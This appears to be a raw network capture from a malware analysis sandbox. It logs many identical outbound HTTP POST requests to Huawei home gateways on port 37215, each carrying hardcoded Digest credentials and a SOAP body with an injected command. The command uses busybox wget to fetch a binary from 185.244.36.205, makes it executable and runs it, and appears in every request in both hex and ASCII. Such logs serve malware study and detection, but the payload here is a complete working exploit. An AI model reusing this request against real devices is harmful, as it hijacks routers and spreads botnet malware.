                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1584192.168.2.1560274156.220.198.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645137072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1585192.168.2.1540096121.119.77.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645137072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1586192.168.2.156051041.90.33.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645176888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1587192.168.2.1548886156.128.45.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645188093 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1588192.168.2.153852845.17.47.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645227909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1589192.168.2.153298641.42.183.11337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645236969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1590192.168.2.1534338190.170.150.14537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645242929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1591192.168.2.155608241.209.67.19637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645287991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1592192.168.2.1543312190.46.149.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645350933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1593192.168.2.153820837.54.90.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645350933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
